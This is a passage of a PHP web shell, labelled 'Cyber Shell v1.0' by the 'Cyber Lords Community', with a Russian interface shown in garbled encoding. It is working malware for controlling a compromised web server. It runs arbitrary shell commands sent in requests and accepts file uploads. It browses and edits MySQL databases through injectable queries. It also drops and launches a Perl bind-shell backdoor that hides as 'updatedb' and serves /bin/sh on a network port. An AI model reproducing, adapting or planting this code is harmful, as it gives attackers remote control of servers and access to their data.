if($rto){
|
|
$fr1=$d."/".$filetorename;
|
|
$fr1=str_replace("//","/",$fr1);
|
|
$to1=$d."/".$rto;
|
|
$to1=str_replace("//","/",$to1);
|
|
rename($fr1,$to1);
|
|
echo "File <br><b>$filetorename</b><br>Renamed to <b>$rto</b><br><br>";
|
|
echo "<meta http-equiv=\"REFRESH\" content=\"3;URL=$PHP_SELF?d=$d&show\">";}
|
|
echo $copyr;
|
|
exit;
|
|
}
|
|
|
|
if (isset($tools) or isset($tmkfile))
|
|
echo <<< EOF
|
|
<center>
|
|
<table width="505" border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC">
|
|
<tr height="10">
|
|
<td align="center" bordercolor="#ECE9D8" bgcolor="#FFF8FF">
|
|
<form action="$PHP_SELF" method="POST">
|
|
.: Ñîçäàòü ôàéë :.
|
|
</td>
|
|
</tr height="10">
|
|
<tr>
|
|
<td align="center" bordercolor="#ECE9D8" bgcolor="#FFFFFF">
|
|
<input type=text size=55 name=newfile value="$d/newfile.php">
|
|
<input type=hidden name=tools>
|
|
<input type=submit value="ñîçäàòü">
|
|
</form>
|
|
</td>
|
|
</tr>
|
|
</table>
|
|
</center>
|
|
EOF;
|
|
|
|
if (isset($newfile) && ($newfile!="")){
|
|
$f = fopen("$newfile", "w+");
|
|
fwrite($f, "");
|
|
fclose($f);
|
|
$mydir=updir($newfile);
|
|
echo "<meta http-equiv=Refresh content=\"0; url=$PHP_SELF?d=$mydir&show\">";
|
|
}
|
|
|
|
if (isset($tools) or isset($tbackdoor))
|
|
echo <<< EOF
|
|
<center>
|
|
<table width="505" border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC">
|
|
<tr height="10">
|
|
<td align="center" bordercolor="#ECE9D8" bgcolor="#FFF8FF">
|
|
<form action="$PHP_SELF" method="POST">
|
|
.: Îòêðûòü ïîðò :.
|
|
</td>
|
|
</tr height="10">
|
|
<tr>
|
|
<td align="center" bordercolor="#ECE9D8" bgcolor="#FFFFFF">
|
|
Èìÿ ñêðèïòà: <input type=text size=13 name=bfileneme value="bind.pl"> Ïîðò: <input type=text size=10 name=bport value="65426">
|
|
<input type="hidden" name="d" value="$d" >
|
|
<input type=hidden name=tools>
|
|
<input type=submit value="âûïîëíèòü">
|
|
</form>
|
|
</td>
|
|
</tr>
|
|
</table>
|
|
</center>
|
|
EOF;
|
|
|
|
if (isset($bfileneme) && ($bfileneme!="") && isset($bport) && ($bport!="")){
|
|
$script="
|
|
#!/usr/bin/perl
|
|
\$port = $bport;
|
|
\$port = \$ARGV[0] if \$ARGV[0];
|
|
exit if fork;
|
|
\$0 = \"updatedb\" . \" \" x100;
|
|
\$SIG{CHLD} = 'IGNORE';
|
|
use Socket;
|
|
socket(S, PF_INET, SOCK_STREAM, 0);
|
|
setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
|
|
bind(S, sockaddr_in(\$port, INADDR_ANY));
|
|
listen(S, 50);
|
|
while(1)
|
|
{
|
|
accept(X, S);
|
|
unless(fork)
|
|
{
|
|
open STDIN, \"<&X\";
|
|
open STDOUT, \">&X\";
|
|
open STDERR, \">&X\";
|
|
close X;
|
|
exec(\"/bin/sh\");
|
|
}
|
|
close X;
|
|
}
|
|
";
|
|
|
|
$f = fopen("$d/$bfileneme", "w+");
|
|
fwrite($f, $script);
|
|
fclose($f);
|
|
system("perl $d/$bfileneme");
|
|
echo "<meta http-equiv=Refresh content=\"0; url=$PHP_SELF?d=$d&show\">";
|
|
}
|
|
|
|
if (isset($tools) or isset($tbash))
|
|
echo <<< EOF
|
|
<center>
|
|
<table width="505" border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC">
|
|
<tr height="10">
|
|
<td align="center" bordercolor="#ECE9D8" bgcolor="#FFF8FF">
|
|
<form action="$PHP_SELF" method="GET">
|
|
<input type="hidden" name="d" value="$d" >
|
|
.: Âûïîëíèòü êîìàíäó :.
|
|
</td>
|
|
</tr height="10">
|
|
<tr>
|
|
<td align="center" bordercolor="#ECE9D8" bgcolor="#FFFFFF">
|
|
<input type=hidden name=diz>
|
|
<input type=hidden name=tbash>
|
|
<input type=text size=55 name=cmd value="$cmd">
|
|
<input type=submit value="âûïîëíèòü">
|
|
</form>
|
|
</td>
|
|
</tr>
|
|
</table>
|
|
</center>
|
|
EOF;
|
|
|
|
if (isset($cmd) && ($cmd!="")){
|
|
echo "<pre><div align=\"left\">";
|
|
system($cmd);
|
|
echo "</div></pre>";
|
|
}
|
|
|
|
if (isset($tools) or isset($tupload)){
|
|
$updir="$d/";
|
|
if(empty($go)) {
|
|
echo <<< EOF
|
|
<center>
|
|
<table width="505" border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC">
|
|
<tr height="10">
|
|
<td align="center" bordercolor="#ECE9D8" bgcolor="#FFF8FF">
|
|
<form ENCTYPE="multipart/form-data" action="$PHP_SELF" method="post">
|
|
.: Çàêà÷àòü ôàéë â òåêóùèé êàòàëîã :.
|
|
</td>
|
|
</tr height="10">
|
|
<tr>
|
|
<td align="center" bordercolor="#ECE9D8" bgcolor="#FFFFFF">
|
|
<INPUT NAME="userfile" TYPE="file" SIZE="40">
|
|
<input type="hidden" name="d" value="$d">
|
|
<input type=hidden name=diz>
|
|
<input type=hidden name=tupload>
|
|
<input type="submit" name=go value="Îòïðàâèòü">
|
|
</form>
|
|
</td>
|
|
</tr>
|
|
</table>
|
|
</center>
|
|
EOF;
|
|
}
|
|
else {
|
|
if (is_uploaded_file($userfile)) {
|
|
$fi = "Çàêà÷åí ôàéë $userfile_name ðàçìåðîì $userfile_size áàéò â äèðåêòîðèþ $updir";
|
|
}
|
|
echo "$fi<br><a href='$PHP_SELF?d=$d&show&tupload'>Íàçàä ê êàòàëîãó</a>";
|
|
}
|
|
if (is_uploaded_file($userfile)) {
|
|
$dest=$updir.$userfile_name;
|
|
move_uploaded_file($userfile, $dest);
|
|
}}
|
|
|
|
if ((isset($db_server)) || (isset($db_user)) || (isset($db_pass)) ){
|
|
mysql_connect($db_server, $db_user, $db_pass) or die("íå ìîãó ïîäêëþ÷èòüñÿ ê áàçå");
|
|
}
|
|
|
|
if ((isset($dbname)) and (isset($table)) )
|
|
{
|
|
foreach($_POST as $var => $val)
|
|
if (substr($var,0,7) == 'newpole'){
|
|
if (substr($var,7,strlen($var)) !== ''){
|
|
$indif=substr($var,7,strlen($var));
|
|
echo " $val ";
|
|
mysql_select_db($dbname) or die("Íå ìîãó âûáðàòü áàçó äàííûõ");
|
|
if ($xvar == "")
|
|
$xvar .= $indif;
|
|
else
|
|
$xvar .= ",".$indif;
|
|
if ($xval == "")
|
|
$xval .= "'$val'";
|
|
else
|
|
$xval .= ",'$val'";
|
|
}}
|
|
|
|
if ($xvar != ""){
|
|
mysql_query("INSERT INTO $table ($xvar) values ($xval)");
|
|
}
|
|
|
|
echo "<a href=$PHP_SELF?showtables=$dbname&db_server=$db_server&db_user=$db_user&db_pass=$db_pass>Íàçàä ê ñïèñêó òàáëèö ÁÄ:$dbname</a>";
|
|
mysql_select_db($dbname) or die("Íå ìîãó âûáðàòü áàçó äàííûõ");
|
|
$re=mysql_query("select * from $table");
|
|
echo "<table width='505' border='1' align='center' cellpadding='0' cellspacing='0' bordercolor='#CCCCFF' bgcolor='#FFFFFF'>";
|
|
|
|
$res=mysql_fetch_array($re);
|
|
echo "<tr>";
|
|
if (count($res) > 1)
|
|
foreach($res as $var => $val){
|
|
$nvar=$var;
|
|
if ($nvar !== 0)
|
|
$nvar=$var+128945432;
|
|
if ($nvar == 128945432){
|
|
$var=untag($var);
|
|
echo "<td bgcolor='#CCCCFF' bordercolor='#FFFFFF'><center>$var</center></td>";
|
|
}}
|
|
echo "<td></td></tr>";
|
|
|
|
if (isset($_SESSION[limit]) and ($_SESSION[limit] !== "0"))
|
|
$param="limit $_SESSION[limit]";
|
|
|
|
$re=mysql_query("select * from $table $param");
|
|
|
|
while($res=mysql_fetch_array($re)){
|
|
echo "<tr>";
|
|
if (count($res) > 1)
|
|
foreach($res as $var => $val){
|
|
$nvar=$var;
|
|
if ($nvar !== 0)
|
|
$nvar=$var+128945432;
|
|
if (!$pixidname){
|
|
$pixidname=$var;
|
|
$pixid=$val;
|
|
}
|
|
if ($nvar == 128945432){
|
|
$valtext=untag($val);
|
|
if ($valtext == "") $valtext="=Ïóñòî=";
|
|
|
|
|
|
if ($_SESSION[lenth] == "on"){
|
|
if (strlen($valtext)>40){
|
|
$valtext=substr($valtext,0,40);
|
|
$valtext .="...";
|
|
}}
|
|
|
|
echo "<td><a href=$PHP_SELF?dbname=$dbname&mtable=$table&var=$var&pixidname=$pixidname&pixid=$pixid&db_server=$db_server&db_user=$db_user&db_pass=$db_pass>$valtext</a></td>";
|
|
}}
|
|
|
|
echo "<td><a href=$PHP_SELF?dbname=$dbname&mtable=$table&pixidname=$pixidname&pixid=$pixid&db_server=$db_server&db_user=$db_user&db_pass=$db_pass&del>Óäàëèòü</a></td></tr>";
|
|
$pixidname='';
|
|
$pixid='';
|
|
}
|
|
|
|
echo "<form action=\"$PHP_SELF\" method=\"POST\">";
|
|
|
|
$re=mysql_query("select * from $table");
|
|
$res=mysql_fetch_array($re);
|
|
echo "<tr>";
|
|
if (count($res) > 1)
|
|
foreach($res as $var => $val){
|
|
$nvar=$var;
|
|
if ($nvar !== 0)
|
|
$nvar=$var+128945432;
|
|
if ($nvar == 128945432){
|
|
$var=untag($var);
|
|
echo "<td bgcolor='#CCCCFF' bordercolor='#FFFFFF'><center>$var</center></td>";
|
|
}}
|
|
echo "<td></td></tr>";
|
|
|
|
$re=mysql_query("select * from $table");
|
|
$res=mysql_fetch_array($re);
|
|
echo "<tr>";
|
|
if (count($res) > 1)
|
|
foreach($res as $var => $val){
|
|
$nvar=$var;
|
|
if ($nvar !== 0)
|
|
$nvar=$var+128945432;
|
|
if ($nvar == 128945432){
|
|
$var=untag($var);
|
|
echo "<td bgcolor='#FFFFFF' bordercolor='#FFFFFF'><center><input type='text' name='newpole$var' value='$var' size='5'></center></td>";
|
|
}}
|
|
echo "</tr>";
|
|
echo "</table>";
|
|
echo "<input type=\"submit\" value=\"Äîáàâèòü íîâóþ çàïèñü\" >";
|
|
echo "
|
|
<input type=\"hidden\" name=\"dbname\" value=\"$dbname\">
|
|
<input type=\"hidden\" name=\"table\" value=\"$table\">
|
|
<input type=\"hidden\" name=\"db_server\" value=\"$db_server\" >
|
|
<input type=\"hidden\" name=\"db_user\" value=\"$db_user\" >
|
|
<input type=\"hidden\" name=\"db_pass\" value=\"$db_pass\" >
|
|
";
|
|
echo "</form>";
|
|
}
|
|
|
|
if ((isset($dbname)) and (isset($mtable)) and (isset($pixidname)) and (isset($pixid)) and (isset($del))){
|
|
echo "hello";
|
|
mysql_select_db($dbname) or die("Íå ìîãó âûáðàòü áàçó äàííûõ");
|
|
mysql_query("delete from $mtable where $pixidname='$pixid'");
|
|
echo "<head><meta http-equiv=\"refresh\" content=\"0;URL=$PHP_SELF?dbname=$dbname&table=$mtable&db_server=$db_server&db_user=$db_user&db_pass=$db_pass\"></head>";
|
|
}
|
|
|
|
if ((isset($dbname)) and (isset($mtable)) and (isset($var)) and (isset($pixidname)) and (isset($pixid)) and (isset($textofmysql))){
|
|
mysql_select_db($dbname) or die("Íå ìîãó âûáðàòü áàçó äàííûõ");
|
|
mysql_query("update $mtable set $var='$textofmysql' where $pixidname=$pixid");
|
|
}
|
|
|
|
if ((isset($dbname)) and (isset($mtable)) and (isset($var)) and (isset($pixidname)) and (isset($pixid))){
|
|
mysql_select_db($dbname) or die("Íå ìîãó âûáðàòü áàçó äàííûõ");
|
|
$re=mysql_query("select $var from $mtable where $pixidname='$pixid'");
|
|
$res=mysql_fetch_array($re);
|
|
$text=untag($res[$var]);
|
|
|
|
echo "
|
|
<form action=\"$PHP_SELF\" method=\"POST\">
|
|
<textarea name=\"textofmysql\" rows=\"25\" cols=\"60\" wrap=\"OFF\">$text</textarea>
|
|
<input type=\"hidden\" name=\"dbname\" value=\"$dbname\" >
|
|
<input type=\"hidden\" name=\"mtable\" value=\"$mtable\" >
|
|
<input type=\"hidden\" name=\"var\" value=\"$var\" >
|
|
<input type=\"hidden\" name=\"pixidname\" value=\"$pixidname\" >
|
|
<input type=\"hidden\" name=\"pixid\" value=\"$pixid\" >
|
|
<input type=\"hidden\" name=\"db_server\" value=\"$db_server\" >
|
|
<input type=\"hidden\" name=\"db_user\" value=\"$db_user\" >
|
|
<input type=\"hidden\" name=\"db_pass\" value=\"$db_pass\" >
|
|
<br><input type=\"submit\" value=\" Èçìåíèòü \" >
|
|
</form>
|
|
<a href=$PHP_SELF?dbname=$dbname&table=$mtable&db_server=$db_server&db_user=$db_user&db_pass=$db_pass>Âåðíóòüñÿ ê ñïèñêó</a>
|
|
";
|
|
}
|
|
|
|
if (isset($showdb) && empty($showtables)){
|
|
$re=mysql_query("show databases");
|
|
echo "<table width='505' border='1' align='center' cellpadding='0' cellspacing='0' bordercolor='#CCCCFF' bgcolor='#FFFFFF'>";
|
|
echo "<tr><td><center><div style='background-color:#CCCCFF'><span class='style5'>Ñïèñîê äîñòóïíûõ ÁÄ:</span></div></center></td></tr>";
|
|
while($res=mysql_fetch_array($re)){
|
|
echo "<tr><td><center><a href=$PHP_SELF?showtables=$res[0]&db_server=$db_server&db_user=$db_user&db_pass=$db_pass>$res[0]</a></center></td></tr>";
|
|
}
|
|
echo "</table>";
|
|
}
|
|
if (isset($showtables) and !empty($showtables)){
|
|
|
|
if (isset($xlimit)){
|
|
$_SESSION[limit]=$xlimit;
|
|
if (isset($xlenth))
|
|
$_SESSION[lenth]=$xlenth;
|
|
else $_SESSION[lenth]="";
|
|
}
|
|
|
|
echo "<a href=$PHP_SELF?showdb&db_server=$db_server&db_user=$db_user&db_pass=$db_pass>Íàçàä ê ñïèñêó ÁÄ</a>";
|
|
$re=mysql_query("SHOW TABLES FROM $showtables");
|
|
echo "<table width='505' border='1' align='center' cellpadding='0' cellspacing='0' bordercolor='#CCCCFF' bgcolor='#FFFFFF'>";
|
|
echo "<tr><td><center><div style='background-color:#CCCCFF'><span class='style5'>$showtables - Ñïèñîê òàáëèö: </span></div></center></td></tr>";
|
|
while($res=mysql_fetch_array($re)){
|
|
echo "<tr><td><center><a href=$PHP_SELF?dbname=$showtables&table=$res[0]&db_server=$db_server&db_user=$db_user&db_pass=$db_pass>$res[0]</a></td></tr>";
|
|
}
|
|
echo "</table>";
|
|
|
|
if (($_SESSION[lenth]) == "on")
|
|
$ch="checked";
|
|
else
|
|
$ch="";
|
|
|
|
echo <<< EOF
|
|
<form action="$PHP_SELF" method="get">
|
|
<input type="hidden" name="showtables" value="$showtables" >
|
|
<input type="hidden" name="db_server" value="$db_server" >
|
|
<input type="hidden" name="db_user" value="$db_user" >
|
|
<input type="hidden" name="db_pass" value="$db_pass" >
|
|
îãðàíè÷åíèå íà êîëè÷åñòâî âûâîäèìûõ ïîëåé:<br>
|
|
<select name="xlimit">
|
|
<option value="0">Показывать всё</option>
|
|
<option value="10">Первые 10</option>
|
|
<option value="20">Первые 20</option>
|
|
<option value="30">Первые 30</option>
|
|
<option value="50">Первые 50</option>
|
|
<option value="100">Первые 100</option>
|
|
<option value="200">Первые 200</option>
|
|
<option value="500">Первые 500</option>
|
|
<option value="1000">Первые 1000</option>
|
|
<option value="5000">Первые 5000</option>
|
|
</select>
|
|
<br>Âêëþ÷èòü îãðàíè÷åíèå íà äëèíó âûâîäèìûõ ïîëåé <input name="xlenth" type="checkbox" value="on" $ch><br>
|
|
<input type="submit" value="Ïðèìåíèòü" >
|
|
EOF;
|
|
if (isset($_SESSION[limit]) and ($_SESSION[limit] !== "0"))
|
|
echo "<br>Òåêóùåå îãðàíè÷åíèå: $_SESSION[limit]";
|
|
}
|
|
|
|
if (isset($tools) or isset($tmysql))
|
|
echo "
|
|
<center>
|
|
<table width='505' border='0' align='center' cellpadding='0' cellspacing='0' bordercolor='#CCCCCC'>
|
|
<tr height='10'>
|
|
<td align='center' bordercolor='#ECE9D8' bgcolor='#FFF8FF'>
|
|
.: MySQL :.
|
|
</td>
|
|
</tr height='10'>
|
|
<tr>
|
|
<td align='center' bordercolor='#ECE9D8' bgcolor='#FFFFFF'>
|
|
<form name='zapros' method='get' action=''>
|
|
<table width='505' border='0' align='center' cellpadding='0' cellspacing='0' bordercolor='#CCCCFF' bgcolor='#FFFFFF'>
|
|
<tr align='center' >
|
|
<td>
|
|
Host
|
|
</td>
|
|
<td>
|
|
<input name='db_server' type='text' value='localhost'>
|
|
</td>
|
|
</tr>
|
|
<tr align='center' >
|
|
<td>
|
|
Login MySQL
|
|
</td>
|
|
<td>
|
|
<input type='text' name='db_user' value=''>
|
|
</tr>
|
|
<tr align='center' >
|
|
<td>
|
|
Password MySQL
|
|
</td>
|
|
<td>
|
|
<input type='text' name='db_pass' value=''>
|
|
<input type='hidden' name='showdb'>
|
|
</td>
|
|
</tr>
|
|
<tr align='center' >
|
|
<td>
|
|
Èìÿ ÁÄ (íå îáÿçàòåëüíî)
|
|
</td>
|
|
<td>
|
|
<input type='text' name='showtables' value=''>
|
|
</td>
|
|
</tr>
|
|
<tr align='center' >
|
|
<td>
|
|
<input type='submit'>
|
|
</td>
|
|
<td>
|
|
<input type='reset'>
|
|
</td>
|
|
</tr>
|
|
</table>
|
|
</form>
|
|
</td>
|
|
</tr>
|
|
</table>
|
|
</center>
|
|
";
|
|
}
|
|
echo <<< EOF
|
|
<center>.:Cyber Shell (v 1.0):.<br>Copyright © <a href="http://www.cyberlords.net" target="_blank">Cyber Lords Community</a>, 2002-2006</center>
|
|
</td>
|
|
</tr>
|
|
</table>
|
|
EOF;
|
|
|
|
$d=tourl($d);
|
|
echo "
|
|
<center>
|
|
<span class='style1'>
|
|
<a href=$PHP_SELF?d=$d&diz&tmkdir>.: Ñîçäàòü ïàïêó :.</a>
|
|
<a href=$PHP_SELF?d=$d&diz&tmkfile>.: Ñîçäàòü ôàéë :.</a>
|
|
<a href=$PHP_SELF?d=$d&diz&tbackdoor>.: Îòêðûòü ïîðò äëÿ ïîäêëþ÷åíèÿ :.</a><br>
|
|
<a href=$PHP_SELF?d=$d&diz&tbash>.: Bash :.</a>
|
|
<a href=$PHP_SELF?d=$d&diz&tupload>.: Çàêà÷àòü ôàéë :.</a>
|
|
</span>
|
|
</center>
|
|
";
|
|
}
|
|
die;
|
|
?>
|